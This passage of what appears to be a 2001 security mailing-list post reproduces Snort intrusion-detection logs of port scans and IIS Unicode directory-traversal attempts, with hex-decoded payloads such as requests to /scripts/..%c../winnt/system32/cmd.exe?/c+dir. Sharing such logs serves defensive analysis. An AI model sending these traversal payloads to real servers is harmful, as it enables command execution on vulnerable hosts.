040 : 0D 0A ..
----------------------------------------------------------------------------
--
#(1 - 2134) [2001-05-06 18:08:42] 56
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037
TCP: port=46362 -> dport: 80 flags=***AP*** seq=541605131
ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033
Payload: length = 77
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0....
***************************SCAN
#3**********************************************************
----------------------------------------------------------------------------
--
#(1 - 2147) [2001-05-07 02:22:21] spp_portscan: PORTSCAN DETECTED from
210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds)
IPv4: 210.107.187.10 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652
TCP: port=50799 -> dport: 80 flags=******S* seq=2338995863
ack=0 off=6 res=0 win=8760 urp=0 chksum=10291
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2181) [2001-05-07 12:01:30] WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485
TCP: port=61125 -> dport: 80 flags=***AP*** seq=941135384
ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2182) [2001-05-07 12:01:31] WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479
TCP: port=61278 -> dport: 80 flags=***AP*** seq=951451170
ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
************************SCAN #4*******************************************
#(1 - 2150) [2001-05-07 03:07:07] 340
IPv4: 202.107.211.177 -> 209.46.94.80
hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406
TCP: port=56725 -> dport: 80 flags=******S* seq=3486124858
ack=0 off=6 res=0 win=8760 urp=0 chksum=61287
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2173) [2001-05-07 10:15:58] 62
IPv4: 202.107.211.177 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492
TCP: port=32840 -> dport: 80 flags=***AP*** seq=1452480610
ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2174) [2001-05-07 10:16:00] 62
IPv4: 202.107.211.177 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486
TCP: port=33972 -> dport: 80 flags=***AP*** seq=1515064652
ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
Current thread:
- 4 similar IIS attempts in a 48 hour period. Steve Halligan (May 08)
- Re: 4 similar IIS attempts in a 48 hour period. Frank Quinonez (May 11)